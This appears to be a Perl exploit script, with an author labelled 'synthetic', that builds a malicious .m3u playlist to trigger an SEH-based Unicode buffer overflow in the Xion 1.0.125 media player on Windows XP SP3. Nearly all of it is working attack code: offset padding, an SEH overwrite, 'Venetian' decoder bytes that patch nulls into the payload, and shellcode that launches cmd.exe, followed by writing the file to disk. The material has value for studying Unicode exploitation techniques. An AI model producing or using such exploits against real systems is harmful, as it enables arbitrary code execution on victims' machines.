UTF-16LE SEH exploit. Win NT 5.1.2600 (Windows XP SP3) "Venetian technique"

  1. #!/usr/bin/perl
  2. # ########################################################################
  3. # Title:                Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
  4. # Vulnerability Type:   Execute Code, Overflow UTF-16LE buffer, Memory corruption
  5. # Date:                 Feb 18, 2018
  6. # Author:               James Anderson (synthetic)
  7. # Original Advisory:    http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
  8. # Exploit mitigation:   There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
  9. # About:                The technique is taken from that paper: Creating
  10. #                       Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
  11. # Tested on:            Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
  12. # ########################################################################
  13. #                   _   _          _   _      
  14. #   ___ _   _ _ __ | |_| |__   ___| |_(_) ___
  15. #  / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
  16. #  \__ \ |_| | | | | |_| | | |  __/ |_| | (__
  17. #  |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
  18. #       |___/                                        
  19. #
  20. # ########################################################################
  21.                                          
  22.  my $path = "/media/s4/DragonR.m3u";
  23.  
  24.  my $buffer_length = 5000;
  25.  my $suboffset = 0x104;
  26.  my $NOP1 = "\x6F"; # add [edi], ch
  27.  my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx
  28.  
  29.  # [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
  30.  my $crash = "A" x 260;
  31.  # [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
  32.  $crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
  33.  $crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR
  34.  
  35.  my $offset_to_payload = length($crash);
  36.  
  37.  # [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
  38.     # [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
  39.     $crash .= $NOP1; # NOP-eq
  40.     $crash .= "\x6a\x59"; # push 0 # pop ecx
  41.     $crash .= $NOP1; # NOP-eq
  42.     $crash .= "\x41"; # inc ecx
  43.     $crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
  44.     $crash .= $NOP1; # NOP-eq
  45.     $crash .= "\x41"; # inc ecx
  46.     $crash .= "\xC8"; # add al, cl
  47.     $crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;
  48.  
  49.     # [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
  50.     $crash .= $NOP1; # NOP-eq
  51.     $crash .= "\xba\x3b\x41"; # mov edx, 41003b00
  52.     $crash .= "\x30"; # add [eax],dh         
  53.     $crash .= $NOP1; # NOP-eq
  54.  
  55.     # [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
  56.     $crash .= "\x40"; # inc eax
  57.     $crash .= $NOP1; # NOP-eq
  58.     $crash .= "\xba\xec\x41"; # mov edx, 4100ec00
  59.     $crash .= "\x30"; # add [eax],dh       
  60.  
  61.     # [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
  62.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  63.     $crash .= $NOP1; # NOP-eq
  64.     $crash .= "\xba\x45\x41"; # mov edx, 41004500
  65.     $crash .= "\x30"; # add [eax],dh
  66.     $crash .= $NOP1; # NOP-eq
  67.     $crash .= "\xba\x46\x41"; # mov edx, 41004600
  68.     $crash .= "\x30"; # add [eax],dh
  69.  
  70.     # [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  71.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  72.     $crash .= $NOP1; # NOP-eq
  73.     $crash .= "\xba\x68\x41"; # mov edx, 41006800
  74.     $crash .= "\x30"; # add [eax],dh
  75.  
  76.     # [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  77.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  78.     $crash .= $NOP1; # NOP-eq
  79.     $crash .= "\xba\x78\x41"; # mov edx, 41007800
  80.     $crash .= "\x30"; # add [eax],dh
  81.  
  82.     # [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  83.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  84.     $crash .= $NOP1; # NOP-eq
  85.     $crash .= "\xba\x2F\x41"; # mov edx, 41002F00
  86.     $crash .= "\x30"; # add [eax],dh
  87.  
  88.     # [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  89.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  90.     $crash .= $NOP1; # NOP-eq
  91.     $crash .= "\xba\x63\x41"; # mov edx, 41006300
  92.     $crash .= "\x30"; # add [eax],dh
  93.  
  94.     # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  95.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  96.     $crash .= $NOP1; # NOP-eq
  97.     $crash .= "\xba\x64\x41"; # mov edx, 41006400
  98.     $crash .= "\x30"; # add [eax],dh
  99.  
  100.     # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  101.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  102.     $crash .= $NOP1; # NOP-eq
  103.     $crash .= "\xba\x8d\x41"; # mov edx, 41008d00
  104.     $crash .= "\x30"; # add [eax],dh
  105.  
  106.     # [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  107.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  108.     $crash .= $NOP1; # NOP-eq
  109.     $crash .= "\xba\xf8\x41"; # mov edx, 4100f800
  110.     $crash .= "\x30"; # add [eax],dh
  111.  
  112.     # [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  113.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  114.     $crash .= $NOP1; # NOP-eq
  115.     $crash .= "\xba\xb8\x41"; # mov edx, 4100b800
  116.     $crash .= "\x30"; # add [eax],dh
  117.  
  118.     # [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  119.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  120.     $crash .= $NOP1; # NOP-eq
  121.     $crash .= "\xba\x49\x41"; # mov edx, 41004900
  122.     $crash .= "\x30"; # add [eax],dh
  123.     $crash .= $NOP1; # NOP-eq
  124.     $crash .= "\xba\x4A\x41"; # mov edx, 41004A00
  125.     $crash .= "\x30"; # add [eax],dh
  126.  
  127.     # [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  128.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  129.     $crash .= $NOP1; # NOP-eq
  130.     $crash .= "\xba\x77\x41"; # mov edx, 41007700
  131.     $crash .= "\x30"; # add [eax],dh
  132.  
  133.     # [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  134.     $crash .= "\xC8"; # add al, cl # eq eax + 2
  135.     $crash .= $NOP1; # NOP-eq
  136.     $crash .= "\xba\xd0\x41"; # mov edx, 4100d000
  137.     $crash .= "\x30"; # add [eax],dh
  138.  
  139.  # [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
  140.                              # *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
  141.  $crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
  142.  $crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)
  143.  
  144.  
  145.  # [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
  146. my $shellcode =
  147. "\x50". # "\x8b". # # BAD BYTE
  148.     # "\xec". # 0
  149. "\x55". # "\x55".
  150.     # "\x8b". # 0   # BAD BYTE  
  151. "\xec". # "\xec".
  152.     # "\x68". # 0
  153. "\x65". # "\x65".
  154.     # "\x78". # 0
  155. "\x65". # "\x65".
  156.     # "\x2F". # 0
  157. "\x68". # "\x68".
  158.     # "\x63". # 0
  159. "\x6d". # "\x6d".
  160.     # "\x64". # 0
  161. "\x2e". # "\x2e".
  162.     # "\x8d". # 0
  163. "\x45". # "\x45".
  164.     # "\xf8". # 0
  165. "\x50". # "\x50".
  166.     # "\xb8". # 0
  167. "\xc7". # "\xc7".
  168.     # "\x93". # 0   # BAD BYTE  
  169. "\xc2". # "\xc2".
  170.     # "\x77". # 0
  171. "\xff"; # "\xff".
  172.     # "\xd0"; # 0
  173.  
  174.  $crash .= $shellcode;
  175.  
  176.  $crash .= "C" x ($buffer_length - length($crash));
  177.  open(myfile, ">$path");
  178.  print myfile $crash;